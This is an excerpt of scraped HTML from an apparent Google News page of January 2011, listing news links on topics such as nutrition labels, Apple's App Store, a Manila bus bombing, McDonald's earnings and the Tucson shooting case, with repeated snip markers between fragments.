<div class="aa-inner"><a href="http://www.washingtonpost.com/wp-dyn/content/article/2011/01/24/AR2011012406470.html" target="_blank" class="usg-AFQjCNHk9NOZPdqDFXddElh8m_lvKF2RbA " id="MAA4AEgLUAJgAmoCdXM">Firms bring nutrition labels to fore</a>
...[SNIP]...
<span><a target="_blank" class="usg-AFQjCNGamcPA0SL6kfHK0IbhjdKzrrU4yw " href="http://feeds.nytimes.com/click.phdo?i=4171574b1677b0877e85e5954148e69c" id="MAA4AEgLUANgCGoCdXM"><span class="titletext">
...[SNIP]...
<span><a target="_blank" class="usg-AFQjCNGpdj32WiL_7ZiNsnnO8kzBHN3vGA " href="http://www.reuters.com/article/idUSTRE70O04520110125?feedType=RSS&feedName=domesticNews" id="MAA4AEgLUARgCGoCdXM"><span class="titletext">
...[SNIP]...
<span><a target="_blank" class="usg-AFQjCNGD_63K7i33pVnceXZLkDTbaItsoQ " href="http://www.usatoday.com/yourlife/food/diet-nutrition/2011-01-25-foodfight25_ST_N.htm" id="MAA4AEgLUAVgCGoCdXM"><span class="titletext">
...[SNIP]...
<span><a target="_blank" class="usg-AFQjCNEIPTWyFOwFFj7H73Cs27lKSft3pQ " href="http://www.boston.com/business/articles/2011/01/25/nutrition_information_aimed_at_package_fronts/" id="MAA4AEgLUAZgCGoCdXM"><span class="titletext">
...[SNIP]...
<div class="thumbnail" style=""><a target="_blank" href="http://www.telegraph.co.uk/technology/apple/8278278/Apples-App-store-hits-10-billionth-download.html" class="usg-AFQjCNFwrlLZUveAhyRcADwN9Y7RQ6glRA " title="Telegraph.co.uk"><img alt="" class="" src="http://nt0.ggpht.com/news/tbn/mJexcsYegVtuIM/6.jpg" width="80" height="80"></a> <div class="source "> <a target="_blank" href="http://www.telegraph.co.uk/technology/apple/8278278/Apples-App-store-hits-10-billionth-download.html" class="usg-AFQjCNFwrlLZUveAhyRcADwN9Y7RQ6glRA "> Telegraph.c... </a>
...[SNIP]...
<h2 class="title"> <a target="_blank" class="usg-AFQjCNFD01jlTzuVK-p78scDRYNO2eREHw " href="http://www.computerworld.com/s/article/9205878/2011_Year_of_the_desktop_app_store_" id="MAA4AEgMUABgAWoCdXM"><span class="titletext">
...[SNIP]...
<div class="aa-inner"><a href="http://www.itproportal.com/2011/01/25/apple-app-store-goes-twitter/" target="_blank" class="usg-AFQjCNFFkgai6RxcDNfWyhHhpN-QWkC5dw " id="MAA4AEgMUAFgAmoCdXM">Apple App Store Goes On Twitter</a>
...[SNIP]...
<div class="aa-inner"><a href="http://news.cnet.com/8301-17852_3-20029276-71.html" target="_blank" class="usg-AFQjCNG8H2VktqAMsHReFNwIgHjafJM5Wg " id="MAA4AEgMUAJgAmoCdXM">Woman hangs up on $10000 call from Apple</a>
...[SNIP]...
<span><a target="_blank" class="usg-AFQjCNE4NKmZ-bO-krcRyPLnbE7HadO1ng " href="http://technolog.msnbc.msn.com/_news/2011/01/24/5907778-apple-calls-to-award-woman-10k-she-hangs-up" id="MAA4AEgMUANgCGoCdXM"><span class="titletext">
...[SNIP]...
<span><a target="_blank" class="usg-AFQjCNGzIPukqq0qd92l2yykeeaIvVTHug " href="http://www.bbc.co.uk/go/rss/int/news/-/newsbeat/12266806" id="MAA4AEgMUARgCGoCdXM"><span class="titletext">
...[SNIP]...
<span><a target="_blank" class="usg-AFQjCNHVgc2xuik70cWhAMH-Br_p_sihpA " href="http://www.mercurynews.com/business/ci_17186613" id="MAA4AEgMUAVgCGoCdXM"><span class="titletext">
...[SNIP]...
<span><a target="_blank" class="usg-AFQjCNEmx71C1yiEGag4s2BvqaGBYMUQ3w " href="http://www.informationweek.com/news/hardware/handheld/showArticle.jhtml?articleID=229100083&cid=RSSfeed_IWK_News" id="MAA4AEgMUAZgCGoCdXM"><span class="titletext">
...[SNIP]...
<div class="thumbnail" style=""><a target="_blank" href="http://today.msnbc.msn.com/id/41237457/ns/today-entertainment/" class="usg-AFQjCNEMaWZttwntQok4RRIdtirYaIN7mA " title="msnbc.com"><img alt="" class="" src="http://nt0.ggpht.com/news/tbn/uH0w557Gx5vRRM/6.jpg" width="80" height="80"></a> <div class="source "> <a target="_blank" href="http://today.msnbc.msn.com/id/41237457/ns/today-entertainment/" class="usg-AFQjCNEMaWZttwntQok4RRIdtirYaIN7mA "> msnbc.com </a>
...[SNIP]...
<h2 class="title"> <a target="_blank" class="usg-AFQjCNFctqmK23nef-iMoWXVheexj3Fc8Q " href="http://www.mtv.com/news/articles/1656569/skins-stars-despite-kissing-tony-tea-still-lesbian.jhtml" id="MAA4AEgNUABgAWoCdXM"><span class="titletext">
...[SNIP]...
<div class="aa-inner"><a href="http://www.nydailynews.com/entertainment/tv/2011/01/25/2011-01-25_skins_ep_2_recap_tea_tries_to_overcome_superiority_over_her_peers_group_faces_do.html" target="_blank" class="usg-AFQjCNH8bRcCEH29oi-7_xE6pfdD2yNA3g " id="MAA4AEgNUAFgAmoCdXM">'Skins'' Tea (Sofia Black-D'Elia) tries to overcome superiority over her peers</a>
...[SNIP]...
<div class="aa-inner"><a href="http://www.tvfanatic.com/2011/01/skins-review-tea/" target="_blank" class="usg-AFQjCNGde28JTbZjALerAo_OgFwYxHt0hw " id="MAA4AEgNUAJgAmoCdXM">Skins Review: Hot Lesbian Sex!!!</a>
...[SNIP]...
<span><a target="_blank" class="usg-AFQjCNEfWuNgYPg0ZILv5hSzruDwtuhpzQ " href="http://www.tmz.com/2011/01/24/skins-schick-mtv-commercial-pulled-ptc/" id="MAA4AEgNUANgCGoCdXM"><span class="titletext">
...[SNIP]...
<span><a target="_blank" class="usg-AFQjCNENXxi-UPCdca1EUVCju-ionMEWqA " href="http://tunedin.blogs.time.com/2011/01/25/the-morning-after-second-skins/" id="MAA4AEgNUARgCGoCdXM"><span class="titletext">
...[SNIP]...
<span><a target="_blank" class="usg-AFQjCNGe7TwFsxpL5X7U8Mw3VwnLra2q2g " href="http://watching-tv.ew.com/2011/01/24/skins-mtv-child-porn-jersey-shore/" id="MAA4AEgNUAVgCGoCdXM"><span class="titletext">
...[SNIP]...
<span><a target="_blank" class="usg-AFQjCNFeivtzBnx1HNPVs32vSjfRu97pGA " href="http://www.washingtonpost.com/wp-dyn/content/article/2011/01/24/AR2011012406396.html" id="MAA4AEgNUAZgCGoCdXM"><span class="titletext">
...[SNIP]...
<div class="thumbnail" style=""><a target="_blank" href="http://in.reuters.com/article/idINIndia-54381820110125" class="usg-AFQjCNGTd8WpG5SMNJTPCFWUSIrebxZMEA " title="Reuters India"><img alt="" class="" src="http://nt1.ggpht.com/news/tbn/cVcigKnuY3OZyM/6.jpg" width="80" height="80"></a> <div class="source "> <a target="_blank" href="http://in.reuters.com/article/idINIndia-54381820110125" class="usg-AFQjCNGTd8WpG5SMNJTPCFWUSIrebxZMEA "> Reuters Ind... </a>
...[SNIP]...
<span class="yt-holder"><img class="youtube-icon icon" src="http://www.gstatic.com/news/img/cleardot.gif" alt="" width="16" height="16"></span>
...[SNIP]...
<noscript><a href="http://www.youtube.com/watch?v=eVzgsG-PBuQ">Video: 
Manila Bus Blast Leaves 4 Dead
<img class="youtube-icon icon" src="http://www.gstatic.com/news/img/cleardot.gif" alt="" width="16" height="16"></a>
...[SNIP]...
<div class="aa-inner"><a href="http://www.reuters.com/article/idUSTRE70O1MV20110125" target="_blank" class="usg-AFQjCNG_i6tDzBrxVpfguEeyJgBOYOX5Rg " id="MAA4AEgOUAFgAmoCdXM">Four dead in Manila bus bombing; investigation starts</a>
...[SNIP]...
<span><a target="_blank" class="usg-AFQjCNGaMMS9N7gYyG5t5xc-JnYXzRSF5w " href="http://www.npr.org/templates/story/story.php?storyId=133201226" id="MAA4AEgOUAJgCGoCdXM"><span class="titletext">
...[SNIP]...
<span><a target="_blank" class="usg-AFQjCNH9sGGWcAU2di9fzAAd-AOuP_4BpA " href="http://edition.cnn.com/2011/WORLD/asiapcf/01/25/philippines.bus.bomb/" id="MAA4AEgOUANgCGoCdXM"><span class="titletext">
...[SNIP]...
<span><a target="_blank" class="usg-AFQjCNGOxAIjsdF8I5HXIRAIm5yNB8OCHQ " href="http://www.voanews.com/english/news/asia/Philippines-Bus-Blast-Kills-2-114536154.html" id="MAA4AEgOUAVgCGoCdXM"><span class="titletext">
...[SNIP]...
<div class="thumbnail" style=""><a target="_blank" href="http://abcnews.go.com/Entertainment/slideshow/photos-oprah-winfrey-secret-halfsister-patricia--12298302" class="usg-AFQjCNFv3hauEKXd1KsbG6v3c4q6pDQOhw " title="ABC News"><img alt="" class="" src="http://nt3.ggpht.com/news/tbn/Z8UKO03JuMuYfM/6.jpg" width="80" height="80"></a> <div class="source "> <a target="_blank" href="http://abcnews.go.com/Entertainment/slideshow/photos-oprah-winfrey-secret-halfsister-patricia--12298302" class="usg-AFQjCNFv3hauEKXd1KsbG6v3c4q6pDQOhw "> ABC News </a>
...[SNIP]...
<h2 class="title"> <a target="_blank" class="usg-AFQjCNE7Fz5EwbxKGgzuAdjAkWwQIRJyKA " href="http://abcnews.go.com/Health/MindMoodNews/family-secrets-emotions-oprah-winfreys-revelation/story?id=12751870" id="MAA4AEgPUABgAWoCdXM"><span class="titletext">
...[SNIP]...
<span class="yt-holder"><img class="youtube-icon icon" src="http://www.gstatic.com/news/img/cleardot.gif" alt="" width="16" height="16"></span>
...[SNIP]...
<noscript><a href="http://www.youtube.com/watch?v=ashZeYCLLKw">Video: 
Oprah Finds Sister She Didn't Know She Had
<img class="youtube-icon icon" src="http://www.gstatic.com/news/img/cleardot.gif" alt="" width="16" height="16"></a>
...[SNIP]...
<div class="aa-inner"><a href="http://www.washingtonpost.com/wp-dyn/content/article/2011/01/24/AR2011012406094.html" target="_blank" class="usg-AFQjCNHc8PRjJtA_r-6sLAipgOQmTkUeqw " id="MAA4AEgPUAFgAmoCdXM">Revelation of a half sister means an Oprah Winfrey family windfall</a>
...[SNIP]...
<span><a target="_blank" class="usg-AFQjCNHK46gYZdjQAXcbhaRli6LniG1SMQ " href="http://www.popfi.com/2011/01/25/oprahs-half-sister/" id="MAA4AEgPUAJgCGoCdXM"><span class="titletext">
...[SNIP]...
<span><a target="_blank" class="usg-AFQjCNEpy8YlETU0ho_a7R_kPPB1fFhD1w " href="http://www.associatedcontent.com/article/6262014/oprah_winfrey_reunites_with_halfsister.html" id="MAA4AEgPUANgCGoCdXM"><span class="titletext">
...[SNIP]...
<span><a target="_blank" class="usg-AFQjCNHsWooEP8CzeSP994Mtc3uxXFR_Bg " href="http://www.philly.com/philly/entertainment/20110125_Sideshow__Oprah_reveals_her_secret__A_half-sister.html" id="MAA4AEgPUARgCGoCdXM"><span class="titletext">
...[SNIP]...
<span><a target="_blank" class="usg-AFQjCNEbHZ1QnEfcooEG3W8c8YZWD5vHHA " href="http://www.people.com/people/article/0,,20460315,00.html?xid=rss-topheadlines" id="MAA4AEgPUAVgCGoCdXM"><span class="titletext">
...[SNIP]...
<div class="thumbnail" style=""><a target="_blank" href="http://www.ctv.ca/CTVNews/World/20110121/ivory-coast-gbagbo-orders-un-vehicles-searched-110121/" class="usg-AFQjCNGRo6b-o5f6RtdHla89EEao1mK4LQ " title="CTV.ca"><img alt="" class="" src="http://nt1.ggpht.com/news/tbn/wd2GJA09xMOOhM/6.jpg" width="80" height="80"></a> <div class="source "> <a target="_blank" href="http://www.ctv.ca/CTVNews/World/20110121/ivory-coast-gbagbo-orders-un-vehicles-searched-110121/" class="usg-AFQjCNGRo6b-o5f6RtdHla89EEao1mK4LQ "> CTV.ca </a>
...[SNIP]...
<h2 class="title"> <a target="_blank" class="usg-AFQjCNGh3ZjVoZGGhNMSHQsQxFWCIjQhDQ " href="http://www.voanews.com/english/news/africa/AU-Chief-in-Ivory-Coast-for-Talks-with-Rival-Leaders-114558329.html" id="MAA4AEgQUABgAWoCdXM"><span class="titletext">
...[SNIP]...
<div class="aa-inner"><a href="http://www.bloomberg.com/news/2011-01-25/cocoa-fluctuates-as-ivory-coast-permits-some-bean-exports-sugar-declines.html" target="_blank" class="usg-AFQjCNE3qOBHQefJ2oBBLri58rbv9LJZtQ " id="MAA4AEgQUAFgAmoCdXM">Cocoa Fluctuates as Ivory Coast Permits Some Bean Exports; Sugar Declines</a>
...[SNIP]...
<span><a target="_blank" class="usg-AFQjCNGurqi_xasll9AJrXYC-1MiIemnNw " href="http://allafrica.com/stories/201101250644.html" id="MAA4AEgQUANgCGoCdXM"><span class="titletext">
...[SNIP]...
<span><a target="_blank" class="usg-AFQjCNHFY83V_AAfjDtJZVh0a4dwPgg4bw " href="http://www.reuters.com/article/idUSLDE70O14P20110125" id="MAA4AEgQUARgCGoCdXM"><span class="titletext">
...[SNIP]...
<span><a target="_blank" class="usg-AFQjCNEBPU1Hcc-7k2RJJ76c88A5ASiKQw " href="http://af.reuters.com/article/investingNews/idAFJOE70O0EI20110125" id="MAA4AEgQUAVgCGoCdXM"><span class="titletext">
...[SNIP]...
<span><a target="_blank" class="usg-AFQjCNGxQjL0Xe0xQJO9mKL3moYUdYmacQ " href="http://www.businessweek.com/news/2011-01-25/ivory-coast-s-ouattara-to-let-already-taxed-cocoa-to-be-shipped.html" id="MAA4AEgQUAZgCGoCdXM"><span class="titletext">
...[SNIP]...
<div class="thumbnail" style=""><a target="_blank" href="http://www.reuters.com/article/idUSTRE70N2DK20110125" class="usg-AFQjCNHPMVKKNx2mawktOtZ7l5FnrWvoIQ " title="Reuters"><img alt="" class="" src="http://nt0.ggpht.com/news/tbn/YNo9KTUQtZTd9M/6.jpg" width="80" height="80"></a> <div class="source "> <a target="_blank" href="http://www.reuters.com/article/idUSTRE70N2DK20110125" class="usg-AFQjCNHPMVKKNx2mawktOtZ7l5FnrWvoIQ "> Reuters </a>
...[SNIP]...
<h2 class="title"> <a target="_blank" class="usg-AFQjCNFARx2P5zNvWZAz4sw2rt6U-UJwnA " href="http://www.allheadlinenews.com/briefs/articles/90032000?McDonald%26%23146%3Bs%20hints%20of%20price%20increase%20this%20year" id="MAA4AEgRUABgAWoCdXM"><span class="titletext">
...[SNIP]...
<div class="aa-inner"><a href="http://www.reuters.com/article/idUSN2416456020110124" target="_blank" class="usg-AFQjCNHjS3vYRRTlA-qvmPbstYY5-pM5DA " id="MAA4AEgRUAFgAmoCdXM">CORRECTED - UPDATE 2-McDonald's December sales disappoint; shares fall</a>
...[SNIP]...
<div class="aa-inner"><a href="http://www.nytimes.com/2011/01/25/business/25mcdonald.html?src=twrhp" target="_blank" class="usg-AFQjCNEFCjzArnAipLxhgmi02CYhoR5miQ " id="MAA4AEgRUAJgAmoCdXM">Profit Edges Up at McDonald's, and Its Prices Will, Too</a>
...[SNIP]...
<span><a target="_blank" class="usg-AFQjCNFPrMDRNs8vkUnzFLUmjvLLidTZvA " href="http://online.wsj.com/article/SB10001424052748703555804576101771527131098.html" id="MAA4AEgRUANgCGoCdXM"><span class="titletext">
...[SNIP]...
<span><a target="_blank" class="usg-AFQjCNFfaDQUuI0976Cj63ad4cyPLpG_QQ " href="http://www.latimes.com/business/la-fi-0125-mcdonalds-20110124,0,874800.story" id="MAA4AEgRUARgCGoCdXM"><span class="titletext">
...[SNIP]...
<span><a target="_blank" class="usg-AFQjCNF7_Ws5DYBS0zeqHu0Rr4Yi5dO9oQ " href="http://www.marketwatch.com/story/mcdonalds-quarterly-profit-rises-2-2011-01-24?reflink=MW_news_stmp" id="MAA4AEgRUAVgCGoCdXM"><span class="titletext">
...[SNIP]...
<div class="thumbnail" style=""><a target="_blank" href="http://www.boston.com/sports/football/articles/2011/01/24/nfl_will_close_cowboys_stadium_roof_for_super_bowl/" class="usg-AFQjCNEghBWCFdvufR4bE6_z6OuV5dZ0pw " title="Boston Globe"><img alt="" class="" src="http://nt1.ggpht.com/news/tbn/qdO1rwvn09fEzM/6.jpg" width="80" height="80"></a> <div class="source "> <a target="_blank" href="http://www.boston.com/sports/football/articles/2011/01/24/nfl_will_close_cowboys_stadium_roof_for_super_bowl/" class="usg-AFQjCNEghBWCFdvufR4bE6_z6OuV5dZ0pw "> Boston Glob... </a>
...[SNIP]...
<h2 class="title"> <a target="_blank" class="usg-AFQjCNHFh2GvvfmSVeefor8vLmuG3eJekw " href="http://travel.usatoday.com/flights/post/2011/01/delta-adds-wisconsin-dfw-flights-for-super-bowl/140051/1" id="MAA4AEgSUABgAWoCdXM"><span class="titletext">
...[SNIP]...
<div class="aa-inner"><a href="http://www.bizjournals.com/milwaukee/morning_roundup/2011/01/pack-gear-flies-as-dallas-flights-added.html" target="_blank" class="usg-AFQjCNFYl1bXTkZw_8xO3jwfmtUTgUPDMQ " id="MAA4AEgSUAFgAmoCdXM">Pack gear flies as Dallas flights added</a>
...[SNIP]...
<div class="aa-inner"><a href="http://lifeinc.todayshow.com/_news/2011/01/25/5908197-nfl-playoffs-flash-strong-buy-signal-for-stocks" target="_blank" class="usg-AFQjCNEpW0cGFBYoPK2aOSpry6U8jDARlA " id="MAA4AEgSUAJgAmoCdXM">NFL playoffs flash strong 'buy' signal for stocks</a>
...[SNIP]...
<span><a target="_blank" class="usg-AFQjCNH4oXCRQbj0GVx75XGEVBl7lgmJXw " href="http://bleacherreport.com/articles/584247-super-bowl-2011-everything-you-need-to-know-for-a-great-super-bowl-sunday/entry/44040-super-bowl-2011-should-you-pay-the-price-and-travel-to-dallas" id="MAA4AEgSUANgCGoCdXM"><span class="titletext">
...[SNIP]...
<span><a target="_blank" class="usg-AFQjCNEqG8mxPehu8mJyffEBfUtvwnUaBQ " href="http://www.dallasnews.com/incoming/20110124-cowboys-owner-jerry-jones-excited-about-super-bowl-matchup.ece" id="MAA4AEgSUARgCGoCdXM"><span class="titletext">
...[SNIP]...
<span><a target="_blank" class="usg-AFQjCNHhmIjnxiBjSPpTi6HciKDhhlJklQ " href="http://denver.sbnation.com/denver-broncos/2011/1/25/1954559/super-bowl-history-green-bay-packers-last-appearance-denver-broncos" id="MAA4AEgSUAVgCGoCdXM"><span class="titletext">
...[SNIP]...
<span><a target="_blank" class="usg-AFQjCNHeapDjp_UwWVx3OwaDOPDuOLCpZg " href="http://www.star-telegram.com/2011/01/24/2793479/jerry-jones-switches-focus-to.html" id="MAA4AEgSUAZgCGoCdXM"><span class="titletext">
...[SNIP]...
<div class="thumbnail" style=""><a target="_blank" href="http://www.washingtonpost.com/wp-dyn/content/article/2011/01/25/AR2011012501351.html" class="usg-AFQjCNFHdQBswSmk7lUOk4Kcm7YBf0nwUw " title="Washington Post"><img alt="" class="" src="http://nt1.ggpht.com/news/tbn/-WrEkuynH2TOuM/6.jpg" width="80" height="80"></a> <div class="source "> <a target="_blank" href="http://www.washingtonpost.com/wp-dyn/content/article/2011/01/25/AR2011012501351.html" class="usg-AFQjCNFHdQBswSmk7lUOk4Kcm7YBf0nwUw "> Washington ... </a>
...[SNIP]...
<h2 class="title"> <a target="_blank" class="usg-AFQjCNHVqavhl78e1BGRhCFhDpMYchxwag " href="http://www.reuters.com/article/idUSN2525409520110125" id="MAA4AEgTUABgAWoCdXM"><span class="titletext">
...[SNIP]...
<div class="aa-inner"><a href="http://www.bloomberg.com/news/2011-01-25/dupont-sees-year-eps-3-45-3-75-saw-3-30-3-60-est-3-51.html" target="_blank" class="usg-AFQjCNExpii4NsuowkXIJMgslKUqBurpMA " id="MAA4AEgTUAFgAmoCdXM">DuPont Profit Drops Less Than Expected; 2011 Forecast Raised</a>
...[SNIP]...
<div class="aa-inner"><a href="http://www.marketwatch.com/story/us-stock-futures-slip-amid-earnings-deluge-2011-01-25?reflink=MW_news_stmp" target="_blank" class="usg-AFQjCNGcimztEVak-LjOqD7putfXoCzopQ " id="MAA4AEgTUAJgAmoCdXM">U.S. stock futures slip amid earnings deluge</a>
...[SNIP]...
<span><a target="_blank" class="usg-AFQjCNEi4oP6I32sCYAUCVJ2U9leGd96ag " href="http://www.rttnews.com/Content/USCommentary.aspx?Id=1534946&SM=1" id="MAA4AEgTUARgCGoCdXM"><span class="titletext">
...[SNIP]...
<span><a target="_blank" class="usg-AFQjCNF3rk8geCFqCOxy1HwxiPyW1MZdvA " href="http://blogs.wsj.com/marketbeat/2011/01/25/dupont-results-top-views-as-revenue-jumps/" id="MAA4AEgTUAVgCGoCdXM"><span class="titletext">
...[SNIP]...
<div class="thumbnail" style=""><a target="_blank" href="http://www.theglobeandmail.com/news/world/suspect-pleads-not-guilty-in-deadly-arizona-shooting/article1881169/" class="usg-AFQjCNHXhvYT3CqqZhrlK0TlJfWxK54_Pw " title="Globe and Mail"><img alt="" class="" src="http://nt3.ggpht.com/news/tbn/n7jseiULnXrLMM/6.jpg" width="80" height="80"></a> <div class="source "> <a target="_blank" href="http://www.theglobeandmail.com/news/world/suspect-pleads-not-guilty-in-deadly-arizona-shooting/article1881169/" class="usg-AFQjCNHXhvYT3CqqZhrlK0TlJfWxK54_Pw "> Globe and M... </a>
...[SNIP]...
<h2 class="title"> <a target="_blank" class="usg-AFQjCNHsmAqMdXC30FFaEw2W0lsv51aXOA " href="http://online.wsj.com/article/SB20001424052748703555804576102350092762930.html" id="MAA4AEgUUABgAWoCdXM"><span class="titletext">
...[SNIP]...
<span class="yt-holder"><img class="youtube-icon icon" src="http://www.gstatic.com/news/img/cleardot.gif" alt="" width="16" height="16"></span>
...[SNIP]...
<noscript><a href="http://www.youtube.com/watch?v=AMxZxlkv-6o">Video: 
Loughner Pleads Not Guilty in AZ Shooting
<img class="youtube-icon icon" src="http://www.gstatic.com/news/img/cleardot.gif" alt="" width="16" height="16"></a>
...[SNIP]...
<div class="aa-inner"><a href="http://thecrimereport.org/2011/01/25/tucson-shooting-turning-point-in-death-penalty-debate/" target="_blank" class="usg-AFQjCNEgLCP1DEJ1f5ynlwK35JzR9GyByQ " id="MAA4AEgUUAFgAmoCdXM">Tucson Shooting: Turning Point In Death Penalty Debate?</a>
...[SNIP]...
<span><a target="_blank" class="usg-AFQjCNHzje_hMOUVpDUGpEX9sojDHX2M6w " href="http://www.npr.org/blogs/thetwo-way/2011/01/25/133188453/loughner-pleads-not-guilty" id="MAA4AEgUUAJgCGoCdXM"><span class="titletext">
...[SNIP]...
<span><a target="_blank" class="usg-AFQjCNFIeq_Ns7Eg3Q1K7muYce5YVqST7Q " href="http://www.washingtonpost.com/wp-dyn/content/article/2011/01/24/AR2011012406343.html" id="MAA4AEgUUANgCGoCdXM"><span class="titletext">
...[SNIP]...
<span><a target="_blank" class="usg-AFQjCNHRBBkahFzpw1JR8NdswhIZNcjYIw " href="http://feeds.nytimes.com/click.phdo?i=1134bc987ca2a36b4b35055e16a29639" id="MAA4AEgUUARgCGoCdXM"><span class="titletext">
...[SNIP]...
<span><a target="_blank" class="usg-AFQjCNGclM7GNS2RlRwDlY-I5Sh_tvXrlA " href="http://www.latimes.com/news/nationworld/nation/la-na-jared-loughner-20110125,0,2181209.story" id="MAA4AEgUUAVgCGoCdXM"><span class="titletext">
...[SNIP]...
<div class="thumbnail" style=""><a target="_blank" href="http://www.portfolio.com/business-news/reuters/2011/01/25/stock-index-futures-down-earnings-eyed" class="usg-AFQjCNFszoLxoWot30YUefNdyfEGE4kIHg " title="Portfolio.com"><img alt="" class="" src="http://nt2.ggpht.com/news/tbn/9nA0qAvPpJ5tCM/6.jpg" width="80" height="80"></a> <div class="source "> <a target="_blank" href="http://www.portfolio.com/business-news/reuters/2011/01/25/stock-index-futures-down-earnings-eyed" class="usg-AFQjCNFszoLxoWot30YUefNdyfEGE4kIHg "> Portfolio.c... </a>
...[SNIP]...
<h2 class="title"> <a target="_blank" class="usg-AFQjCNF2jLGtCargCIeSkIo7qnfEjTTITg " href="http://www.marketwatch.com/story/us-stock-futures-hold-losses-after-housing-data-2011-01-25" id="MAA4AEgVUABgAWoCdXM"><span class="titletext">
...[SNIP]...
<div class="aa-inner"><a href="http://online.wsj.com/article/SB10001424052748704698004576103613884707694.html" target="_blank" class="usg-AFQjCNH63dxEzu3MUjCj-H7fBq6jy9-OXg " id="MAA4AEgVUAFgAmoCdXM">Futures Slip On Earnings</a>
...[SNIP]...
<div class="aa-inner"><a href="http://www.foxnews.com/us/2011/01/25/earnings-decide-dow-breaks/" target="_blank" class="usg-AFQjCNEBWRfEEp_6PdxYPJ5HwDtXamG8ZQ " id="MAA4AEgVUAJgAmoCdXM">Earnings will decide if Dow breaks 12000</a>
...[SNIP]...
<span><a target="_blank" class="usg-AFQjCNEcBCxBebysAaamuuqoGdU6r2WTlQ " href="http://www.thestreet.com/story/10983901/1/stock-futures-jan-25.html?cm_ven=GOOGLEN" id="MAA4AEgVUANgCGoCdXM"><span class="titletext">
...[SNIP]...
<span><a target="_blank" class="usg-AFQjCNEQ6-PRUCNN72J9NA3j8YhrRK9cag " href="http://money.cnn.com/2011/01/25/markets/premarkets/" id="MAA4AEgVUARgCGoCdXM"><span class="titletext">
...[SNIP]...
<span><a target="_blank" class="usg-AFQjCNF1V9J-cnX-p6mS5xywLk2umDsG7w " href="http://www.foxbusiness.com/markets/2011/01/24/futures-hint-mini-pullback/" id="MAA4AEgVUAVgCGoCdXM"><span class="titletext">
...[SNIP]...
<span><a target="_blank" class="usg-AFQjCNHn26B9FGrLg4s4yok5aUh5NlOiQg " href="http://www.sltrib.com/sltrib/money/51114328-79/dow-percent-shares-12000.html.csp" id="MAA4AEgVUAZgCGoCdXM"><span class="titletext">
...[SNIP]...
<div class="thumbnail" style=""><a target="_blank" href="http://content.usatoday.com/communities/theoval/post/2011/01/obama-loses-key-staffer-environmental-adviser-browner/1" class="usg-AFQjCNEdnl3yQB_VWr7fqo6iwvSN1Ey3Tw " title="USA Today"><img alt="" class="" src="http://nt0.ggpht.com/news/tbn/VCZGlRd0xpHD1M/6.jpg" width="80" height="80"></a> <div class="source "> <a target="_blank" href="http://content.usatoday.com/communities/theoval/post/2011/01/obama-loses-key-staffer-environmental-adviser-browner/1" class="usg-AFQjCNEdnl3yQB_VWr7fqo6iwvSN1Ey3Tw "> USA Today </a>
...[SNIP]...
<h2 class="title"> <a target="_blank" class="usg-AFQjCNEdnl3yQB_VWr7fqo6iwvSN1Ey3Tw " href="http://content.usatoday.com/communities/theoval/post/2011/01/obama-loses-key-staffer-environmental-adviser-browner/1" id="MAA4AEgWUABgAWoCdXM"><span class="titletext">
...[SNIP]...
<div class="aa-inner"><a href="http://feeds.nytimes.com/click.phdo?i=d9eba8e277eacecc0db34acc6c16eff7" target="_blank" class="usg-AFQjCNErGJpmQblsRYr7n745_8XBgL4g9Q " id="MAA4AEgWUAFgAmoCdXM">Director of Policy on Climate Will Leave, Her Goal Unmet</a>
...[SNIP]...
<div class="aa-inner"><a href="http://www.upi.com/Top_News/US/2011/01/25/Browner-to-leave-Obama-administration/UPI-70761295960281/" target="_blank" class="usg-AFQjCNHSAP4FBvNGOu-kzUSh5JphXjfdqg " id="MAA4AEgWUAJgAmoCdXM">Browner to leave Obama administration</a>
...[SNIP]...
<span><a target="_blank" class="usg-AFQjCNHIbneIrzYccM4uVpuofL27tgDEpg " href="http://www.reuters.com/article/idUSTRE70O0CN20110125?feedType=RSS&feedName=topNews" id="MAA4AEgWUANgCGoCdXM"><span class="titletext">
...[SNIP]...
<span><a target="_blank" class="usg-AFQjCNH78KPkRMzCcmRj4CtQ-YF0ldcHWw " href="http://online.wsj.com/article/SB10001424052748703555804576102810159169324.html" id="MAA4AEgWUARgCGoCdXM"><span class="titletext">
...[SNIP]...
<span><a target="_blank" class="usg-AFQjCNEbw1RQqcrXAGdpgqor3K0S8MDI7w " href="http://www.cnn.com/2011/POLITICS/01/24/obama.browner/" id="MAA4AEgWUAZgCGoCdXM"><span class="titletext">
...[SNIP]...
<div class="title"><a target="_blank" class="usg-AFQjCNGPzQOAl5Cv_02XyR4hgK9rYzyHHA " href="http://www.foxnews.com/world/2011/01/25/medvedev-says-security-bombed-airport-poor/" id="8818998889059102899"><span class="titletext">
...[SNIP]...
<div class="title"><a target="_blank" class="usg-AFQjCNEorucr3owb2THD4rNv5uR-V_q9yg " href="http://www.foxnews.com/us/2011/01/24/authorities-fear-cops-targeted-officers-shot-hours/?test=latestnews" id="-2859349458615803843"><span class="titletext">
...[SNIP]...
<div class="title"><a target="_blank" class="usg-AFQjCNEObXCSMyFFg23_CLj7q-3Ic66PiQ " href="http://www.msnbc.msn.com/id/41247842/ns/world_news-mideastn_africa/" id="8224434751009200465"><span class="titletext">
...[SNIP]...
<div class="title"><a target="_blank" class="usg-AFQjCNH8fU_m8FGFR4iKSXsJpk066N5qag " href="http://voices.washingtonpost.com/dr-gridlock/2011/01/southbound_bw_parkway_blocked.html" id="MAE4AEgAUABgAmoCdXM"><span class="titletext">
...[SNIP]...
<div class="title"><a target="_blank" class="usg-AFQjCNFC1EBvU7F5yxK5gU4tz5-ZypPThg " href="http://voices.washingtonpost.com/capitalsinsider/braden-holtby/another-strong-performance-by.html" id="MAE4AEgBUABgAmoCdXM"><span class="titletext">
...[SNIP]...
<div class="title"><a target="_blank" class="usg-AFQjCNGIrAh-rw28mhCKWop2qRMpETy2Ow " href="http://www.politico.com/news/stories/0111/48087.html" id="MAE4AEgCUABgAmoCdXM"><span class="titletext">
...[SNIP]...
<div class="title"><a target="_blank" class="usg-AFQjCNEUzV7_ZmIL7u4HIu96A-yjfDW-Hw " href="http://www.latimes.com/news/nationworld/nation/la-na-tombstone-20110123,0,7161951.story" id="MAE4AUgAUABgAmoCdXM"><span class="titletext">
...[SNIP]...
<div class="title"><a target="_blank" class="usg-AFQjCNH7t8T2ZuGQS4OfN9KxLM60oQv9Xw " href="http://www.foxbusiness.com/markets/2011/01/19/ski-resorts-reap-profits-unlikely-sources/" id="MAE4AUgBUABgAmoCdXM"><span class="titletext">
...[SNIP]...
